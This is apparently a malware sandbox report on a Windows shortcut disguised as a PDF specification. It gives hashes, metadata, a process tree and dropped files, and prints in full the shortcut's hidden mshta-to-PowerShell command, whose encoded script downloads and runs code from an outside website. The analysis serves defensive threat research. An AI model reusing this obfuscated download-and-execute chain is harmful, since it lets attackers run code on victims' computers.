| Field | Value |
|---|---|
| File name | SPEC-10T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf.lnk |
| Full analysis | https://app.any.run/tasks/766df2a4-39bf-4d00-b123-6ccb3f7a595e |
| Verdict | Malicious activity |
| Analysis date | January 23, 2019, 07:22:33 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators | |
| MIME | application/octet-stream |
| File info | MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Fri Sep 29 12:41:16 2017, mtime=Fri Sep 29 12:41:16 2017, atime=Fri Sep 29 12:41:16 2017, length=14848, window=hide |
| MD5 | EC0FB9D17EC77AD05F9A69879327E2F9 |
| SHA1 | E11C241747E473B7ED980CF13A41EA7DF1EAE7F7 |
| SHA256 | 8F4BC2518BAA580CA3AEC191FB2FBE7EC087B6B6BC722E54ABE3249ED85C9E4B |
| SSDEEP | 24:8DLVC5Uk7unX6m+/e2XMfga/uUCCpK7YGcyruHmg7Ii8A5lIyunhceUabrl:8nVPqZXMfgKuUCCpWfcyruHmg7Iidad |
.lnk: Windows Shortcut (100)

| Field | Value |
|---|---|
| Flags | IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpString |
| FileAttributes | Archive |
| CreateDate | 2017:09:29 15:41:16+02:00 |
| AccessDate | 2017:09:29 15:41:16+02:00 |
| ModifyDate | 2017:09:29 15:41:16+02:00 |
| TargetFileSize | 14848 |
| IconIndex | (none) |
| RunWindow | Normal |
| HotKey | (none) |
| TargetFileDOSName | mshta.exe |
| DriveType | Fixed Disk |
| VolumeLabel | WIN10 |
| LocalBasePath | `C:\Windows\System32\mshta.exe` |
| Description | Type: Text Document |
| RelativePath | `..\..\..\Windows\System32\mshta.exe` |
| CommandLineArguments | `vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -e """"aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgAGgAdAB0AHAAOgAvAC8AcwBpAG4AbwBwAHQAaQBrAC4AdwBlAGIAcwBpAHQAZQAvAEUAdQBjAHoAUwBjACkAIAA="""""", 0 : window.close")` |
| IconFileName | `.\128_2_21.docx` |
| MachineID | oggy |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 3128 | `"C:\Windows\System32\mshta.exe" vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -e """"aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgAGgAdAB0AHAAOgAvAC8AcwBpAG4AbwBwAHQAaQBrAC4AdwBlAGIAcwBpAHQAZQAvAEUAdQBjAHoAUwBjACkAIAA="""""", 0 : window.close")` | `C:\Windows\System32\mshta.exe` | — | explorer.exe |
| 2228 | `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e "aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgAGgAdAB0AHAAOgAvAC8AcwBpAG4AbwBwAHQAaQBrAC4AdwBlAGIAcwBpAHQAZQAvAEUAdQBjAHoAUwBjACkAIAA="` | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | — | mshta.exe |

Process details for PID 3128 (mshta.exe): User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Exit code: 0; Version: 8.00.7600.16385 (win7_rtm.090713-1255)

Process details for PID 2228 (powershell.exe): User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2228 | powershell.exe | `C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1PPLM233YA4AQP575TJJ.temp` | — | — | — |
| 2228 | powershell.exe | `C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20e802.TMP` | binary | 2BCAD5DA21CB41B727ABDE7D6B6990B8 | AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
| 2228 | powershell.exe | `C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms` | binary | 2BCAD5DA21CB41B727ABDE7D6B6990B8 | AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |